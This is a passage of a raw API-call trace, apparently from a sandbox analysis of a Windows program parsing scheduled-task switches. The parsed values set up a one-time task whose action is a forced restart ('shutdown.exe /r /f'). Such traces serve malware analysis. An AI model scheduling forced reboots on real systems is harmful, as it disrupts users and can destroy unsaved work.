_Buffer="|rp|") returned 4 [0038.837] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.837] lstrlenW (lpString="|rp|") returned 4 [0038.837] lstrlenW (lpString="|SC|") returned 4 [0038.837] StrStrIW (lpFirst="|rp|", lpSrch="|SC|") returned 0x0 [0038.837] SetLastError (dwErrCode=0x490) [0038.837] lstrlenW (lpString="sc") returned 2 [0038.837] lstrlenW (lpString="sc") returned 2 [0038.837] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.837] lstrlenW (lpString="SC") returned 2 [0038.837] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.838] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|sc|") returned 4 [0038.838] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|SC|") returned 4 [0038.838] lstrlenW (lpString="|sc|") returned 4 [0038.838] lstrlenW (lpString="|SC|") returned 4 [0038.838] StrStrIW (lpFirst="|sc|", lpSrch="|SC|") returned="|sc|" [0038.838] SetLastError (dwErrCode=0x0) [0038.838] SetLastError (dwErrCode=0x0) [0038.838] lstrlenW (lpString="once") returned 4 [0038.838] lstrlenW (lpString="-/") returned 2 [0038.838] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0038.838] SetLastError (dwErrCode=0x490) [0038.838] SetLastError (dwErrCode=0x490) [0038.838] SetLastError (dwErrCode=0x0) [0038.838] lstrlenW (lpString="once") returned 4 [0038.838] StrChrIW (lpStart="once", wMatch=0x3a) returned 0x0 [0038.838] SetLastError (dwErrCode=0x490) [0038.838] SetLastError (dwErrCode=0x0) [0038.838] _memicmp (_Buf1=0x5a4c48, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.838] lstrlenW (lpString="once") returned 4 [0038.839] lstrlenW (lpString="once") returned 4 [0038.839] lstrlenW (lpString=" \x09") returned 2 [0038.839] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0038.839] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0038.839] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0038.839] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0038.839] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0038.839] GetLastError () returned 0x0 [0038.839] lstrlenW (lpString="once") returned 4 [0038.839] lstrlenW (lpString="once") returned 4 [0038.839] SetLastError (dwErrCode=0x0) [0038.839] SetLastError (dwErrCode=0x0) [0038.839] lstrlenW (lpString="/TN") returned 3 [0038.839] lstrlenW (lpString="-/") returned 2 [0038.839] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.839] lstrlenW (lpString="create") returned 6 [0038.839] lstrlenW (lpString="create") returned 6 [0038.839] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.839] lstrlenW (lpString="TN") returned 2 [0038.839] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.839] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|create|") returned 8 [0038.840] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.840] lstrlenW (lpString="|create|") returned 8 [0038.840] lstrlenW (lpString="|TN|") returned 4 [0038.840] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0038.840] SetLastError (dwErrCode=0x490) [0038.840] lstrlenW (lpString="?") returned 1 [0038.840] lstrlenW (lpString="?") returned 1 [0038.840] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.840] lstrlenW (lpString="TN") returned 2 [0038.840] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.840] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|?|") returned 3 [0038.840] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.840] lstrlenW (lpString="|?|") returned 3 [0038.840] lstrlenW (lpString="|TN|") returned 4 [0038.840] SetLastError (dwErrCode=0x490) [0038.840] lstrlenW (lpString="s") returned 1 [0038.840] lstrlenW (lpString="s") returned 1 [0038.840] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.840] lstrlenW (lpString="TN") returned 2 [0038.840] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.841] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|s|") returned 3 [0038.841] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.841] lstrlenW (lpString="|s|") returned 3 [0038.841] lstrlenW (lpString="|TN|") returned 4 [0038.841] SetLastError (dwErrCode=0x490) [0038.841] lstrlenW (lpString="u") returned 1 [0038.841] lstrlenW (lpString="u") returned 1 [0038.841] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.841] lstrlenW (lpString="TN") returned 2 [0038.841] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.841] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|u|") returned 3 [0038.841] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.841] lstrlenW (lpString="|u|") returned 3 [0038.841] lstrlenW (lpString="|TN|") returned 4 [0038.841] SetLastError (dwErrCode=0x490) [0038.841] lstrlenW (lpString="p") returned 1 [0038.841] lstrlenW (lpString="p") returned 1 [0038.841] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.842] lstrlenW (lpString="TN") returned 2 [0038.842] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.842] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|p|") returned 3 [0038.842] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.842] lstrlenW (lpString="|p|") returned 3 [0038.842] lstrlenW (lpString="|TN|") returned 4 [0038.842] SetLastError (dwErrCode=0x490) [0038.842] lstrlenW (lpString="ru") returned 2 [0038.842] lstrlenW (lpString="ru") returned 2 [0038.842] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.842] lstrlenW (lpString="TN") returned 2 [0038.842] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.842] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ru|") returned 4 [0038.842] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.842] lstrlenW (lpString="|ru|") returned 4 [0038.842] lstrlenW (lpString="|TN|") returned 4 [0038.842] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0038.842] SetLastError (dwErrCode=0x490) [0038.843] lstrlenW (lpString="rp") returned 2 [0038.843] lstrlenW (lpString="rp") returned 2 [0038.843] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.843] lstrlenW (lpString="TN") returned 2 [0038.843] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.843] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|rp|") returned 4 [0038.843] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.843] lstrlenW (lpString="|rp|") returned 4 [0038.843] lstrlenW (lpString="|TN|") returned 4 [0038.843] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0038.843] SetLastError (dwErrCode=0x490) [0038.843] lstrlenW (lpString="sc") returned 2 [0038.843] lstrlenW (lpString="sc") returned 2 [0038.843] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.843] lstrlenW (lpString="TN") returned 2 [0038.843] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.843] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|sc|") returned 4 [0038.843] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.843] lstrlenW (lpString="|sc|") returned 4 [0038.843] lstrlenW (lpString="|TN|") returned 4 [0038.844] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0 [0038.844] SetLastError (dwErrCode=0x490) [0038.844] lstrlenW (lpString="mo") returned 2 [0038.844] lstrlenW (lpString="mo") returned 2 [0038.844] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.844] lstrlenW (lpString="TN") returned 2 [0038.844] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.844] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|mo|") returned 4 [0038.844] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.844] lstrlenW (lpString="|mo|") returned 4 [0038.844] lstrlenW (lpString="|TN|") returned 4 [0038.844] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0 [0038.844] SetLastError (dwErrCode=0x490) [0038.844] lstrlenW (lpString="d") returned 1 [0038.844] lstrlenW (lpString="d") returned 1 [0038.844] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.844] lstrlenW (lpString="TN") returned 2 [0038.844] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.844] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|d|") returned 3 [0038.844] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.845] lstrlenW (lpString="|d|") returned 3 [0038.845] lstrlenW (lpString="|TN|") returned 4 [0038.845] SetLastError (dwErrCode=0x490) [0038.845] lstrlenW (lpString="m") returned 1 [0038.845] lstrlenW (lpString="m") returned 1 [0038.845] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.845] lstrlenW (lpString="TN") returned 2 [0038.845] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.845] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|m|") returned 3 [0038.845] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.845] lstrlenW (lpString="|m|") returned 3 [0038.845] lstrlenW (lpString="|TN|") returned 4 [0038.845] SetLastError (dwErrCode=0x490) [0038.845] lstrlenW (lpString="i") returned 1 [0038.845] lstrlenW (lpString="i") returned 1 [0038.845] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.845] lstrlenW (lpString="TN") returned 2 [0038.845] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.845] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|i|") returned 3 [0038.845] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.846] lstrlenW (lpString="|i|") returned 3 [0038.846] lstrlenW (lpString="|TN|") returned 4 [0038.846] SetLastError (dwErrCode=0x490) [0038.846] lstrlenW (lpString="tn") returned 2 [0038.846] lstrlenW (lpString="tn") returned 2 [0038.846] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.846] lstrlenW (lpString="TN") returned 2 [0038.846] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.846] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|tn|") returned 4 [0038.846] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TN|") returned 4 [0038.846] lstrlenW (lpString="|tn|") returned 4 [0038.846] lstrlenW (lpString="|TN|") returned 4 [0038.846] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0038.846] SetLastError (dwErrCode=0x0) [0038.846] SetLastError (dwErrCode=0x0) [0038.846] lstrlenW (lpString="") returned 0 [0038.846] SetLastError (dwErrCode=0x490) [0038.846] SetLastError (dwErrCode=0x0) [0038.846] lstrlenW (lpString="") returned 0 [0038.846] SetLastError (dwErrCode=0x490) [0038.846] SetLastError (dwErrCode=0x0) [0038.847] lstrlenW (lpString="") returned 0 [0038.847] SetLastError (dwErrCode=0x0) [0038.847] SetLastError (dwErrCode=0x0) [0038.847] lstrlenW (lpString="/TR") returned 3 [0038.847] lstrlenW (lpString="-/") returned 2 [0038.847] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0038.847] lstrlenW (lpString="create") returned 6 [0038.847] lstrlenW (lpString="create") returned 6 [0038.847] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.847] lstrlenW (lpString="TR") returned 2 [0038.847] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.847] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|create|") returned 8 [0038.847] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.847] lstrlenW (lpString="|create|") returned 8 [0038.847] lstrlenW (lpString="|TR|") returned 4 [0038.847] StrStrIW (lpFirst="|create|", lpSrch="|TR|") returned 0x0 [0038.847] SetLastError (dwErrCode=0x490) [0038.847] lstrlenW (lpString="?") returned 1 [0038.847] lstrlenW (lpString="?") returned 1 [0038.847] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.848] lstrlenW (lpString="TR") returned 2 [0038.848] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.848] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|?|") returned 3 [0038.848] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.848] lstrlenW (lpString="|?|") returned 3 [0038.848] lstrlenW (lpString="|TR|") returned 4 [0038.848] SetLastError (dwErrCode=0x490) [0038.848] lstrlenW (lpString="s") returned 1 [0038.848] lstrlenW (lpString="s") returned 1 [0038.848] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.848] lstrlenW (lpString="TR") returned 2 [0038.848] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.848] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|s|") returned 3 [0038.848] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.848] lstrlenW (lpString="|s|") returned 3 [0038.848] lstrlenW (lpString="|TR|") returned 4 [0038.848] SetLastError (dwErrCode=0x490) [0038.848] lstrlenW (lpString="u") returned 1 [0038.848] lstrlenW (lpString="u") returned 1 [0038.848] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.849] lstrlenW (lpString="TR") returned 2 [0038.849] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.849] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|u|") returned 3 [0038.849] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.849] lstrlenW (lpString="|u|") returned 3 [0038.849] lstrlenW (lpString="|TR|") returned 4 [0038.849] SetLastError (dwErrCode=0x490) [0038.849] lstrlenW (lpString="p") returned 1 [0038.849] lstrlenW (lpString="p") returned 1 [0038.849] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.849] lstrlenW (lpString="TR") returned 2 [0038.849] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.849] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|p|") returned 3 [0038.849] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.849] lstrlenW (lpString="|p|") returned 3 [0038.849] lstrlenW (lpString="|TR|") returned 4 [0038.849] SetLastError (dwErrCode=0x490) [0038.849] lstrlenW (lpString="ru") returned 2 [0038.849] lstrlenW (lpString="ru") returned 2 [0038.849] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.849] lstrlenW (lpString="TR") returned 2 [0038.850] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.850] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|ru|") returned 4 [0038.850] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.850] lstrlenW (lpString="|ru|") returned 4 [0038.850] lstrlenW (lpString="|TR|") returned 4 [0038.850] StrStrIW (lpFirst="|ru|", lpSrch="|TR|") returned 0x0 [0038.850] SetLastError (dwErrCode=0x490) [0038.850] lstrlenW (lpString="rp") returned 2 [0038.850] lstrlenW (lpString="rp") returned 2 [0038.850] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.850] lstrlenW (lpString="TR") returned 2 [0038.850] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.850] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|rp|") returned 4 [0038.850] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.850] lstrlenW (lpString="|rp|") returned 4 [0038.850] lstrlenW (lpString="|TR|") returned 4 [0038.850] StrStrIW (lpFirst="|rp|", lpSrch="|TR|") returned 0x0 [0038.850] SetLastError (dwErrCode=0x490) [0038.850] lstrlenW (lpString="sc") returned 2 [0038.850] lstrlenW (lpString="sc") returned 2 [0038.851] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.851] lstrlenW (lpString="TR") returned 2 [0038.851] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.851] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|sc|") returned 4 [0038.851] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.851] lstrlenW (lpString="|sc|") returned 4 [0038.851] lstrlenW (lpString="|TR|") returned 4 [0038.851] StrStrIW (lpFirst="|sc|", lpSrch="|TR|") returned 0x0 [0038.851] SetLastError (dwErrCode=0x490) [0038.851] lstrlenW (lpString="mo") returned 2 [0038.851] lstrlenW (lpString="mo") returned 2 [0038.851] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.851] lstrlenW (lpString="TR") returned 2 [0038.851] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.851] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|mo|") returned 4 [0038.851] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.851] lstrlenW (lpString="|mo|") returned 4 [0038.851] lstrlenW (lpString="|TR|") returned 4 [0038.851] StrStrIW (lpFirst="|mo|", lpSrch="|TR|") returned 0x0 [0038.852] SetLastError (dwErrCode=0x490) [0038.852] lstrlenW (lpString="d") returned 1 [0038.853] lstrlenW (lpString="d") returned 1 [0038.853] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.854] lstrlenW (lpString="TR") returned 2 [0038.854] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.854] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|d|") returned 3 [0038.854] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.854] lstrlenW (lpString="|d|") returned 3 [0038.854] lstrlenW (lpString="|TR|") returned 4 [0038.854] SetLastError (dwErrCode=0x490) [0038.854] lstrlenW (lpString="m") returned 1 [0038.854] lstrlenW (lpString="m") returned 1 [0038.854] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.854] lstrlenW (lpString="TR") returned 2 [0038.854] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.854] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|m|") returned 3 [0038.854] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.854] lstrlenW (lpString="|m|") returned 3 [0038.854] lstrlenW (lpString="|TR|") returned 4 [0038.854] SetLastError (dwErrCode=0x490) [0038.854] lstrlenW (lpString="i") returned 1 [0038.854] lstrlenW (lpString="i") returned 1 [0038.854] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.855] lstrlenW (lpString="TR") returned 2 [0038.855] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.855] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|i|") returned 3 [0038.855] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.855] lstrlenW (lpString="|i|") returned 3 [0038.855] lstrlenW (lpString="|TR|") returned 4 [0038.855] SetLastError (dwErrCode=0x490) [0038.855] lstrlenW (lpString="tn") returned 2 [0038.855] lstrlenW (lpString="tn") returned 2 [0038.855] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.855] lstrlenW (lpString="TR") returned 2 [0038.855] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.855] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|tn|") returned 4 [0038.855] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.855] lstrlenW (lpString="|tn|") returned 4 [0038.855] lstrlenW (lpString="|TR|") returned 4 [0038.855] StrStrIW (lpFirst="|tn|", lpSrch="|TR|") returned 0x0 [0038.855] SetLastError (dwErrCode=0x490) [0038.855] lstrlenW (lpString="tr") returned 2 [0038.855] lstrlenW (lpString="tr") returned 2 [0038.856] _memicmp (_Buf1=0x5a4be8, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.856] lstrlenW (lpString="TR") returned 2 [0038.856] _memicmp (_Buf1=0x5a4c18, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.856] _vsnwprintf (in: _Buffer=0x5a5288, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|tr|") returned 4 [0038.856] _vsnwprintf (in: _Buffer=0x5a5248, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18cbec | out: _Buffer="|TR|") returned 4 [0038.856] lstrlenW (lpString="|tr|") returned 4 [0038.856] lstrlenW (lpString="|TR|") returned 4 [0038.856] StrStrIW (lpFirst="|tr|", lpSrch="|TR|") returned="|tr|" [0038.856] SetLastError (dwErrCode=0x0) [0038.856] SetLastError (dwErrCode=0x0) [0038.856] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.856] lstrlenW (lpString="-/") returned 2 [0038.856] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0038.856] SetLastError (dwErrCode=0x490) [0038.856] SetLastError (dwErrCode=0x490) [0038.856] SetLastError (dwErrCode=0x0) [0038.856] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.856] StrChrIW (lpStart="C:\\Windows\\system32\\shutdown.exe /r /f", wMatch=0x3a) returned=":\\Windows\\system32\\shutdown.exe /r /f" [0038.856] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.856] _memicmp (_Buf1=0x5a4c30, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.856] _memicmp (_Buf1=0x5a4c60, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.857] SetLastError (dwErrCode=0x7a) [0038.857] SetLastError (dwErrCode=0x0) [0038.857] SetLastError (dwErrCode=0x0) [0038.857] lstrlenW (lpString="C") returned 1 [0038.857] SetLastError (dwErrCode=0x490) [0038.857] SetLastError (dwErrCode=0x0) [0038.857] _memicmp (_Buf1=0x5a4c48, _Buf2=0x7b1ed8, _Size=0x7) returned 0 [0038.857] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.857] lstrlenW (lpString="C:\\Windows\\system32\\shutdown.exe /r /f") returned 38 [0038.857] lstrlenW (lpString=" \x09") returned 2 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0038.857] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0038.858] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0038.858] StrChrW (lpStart=" 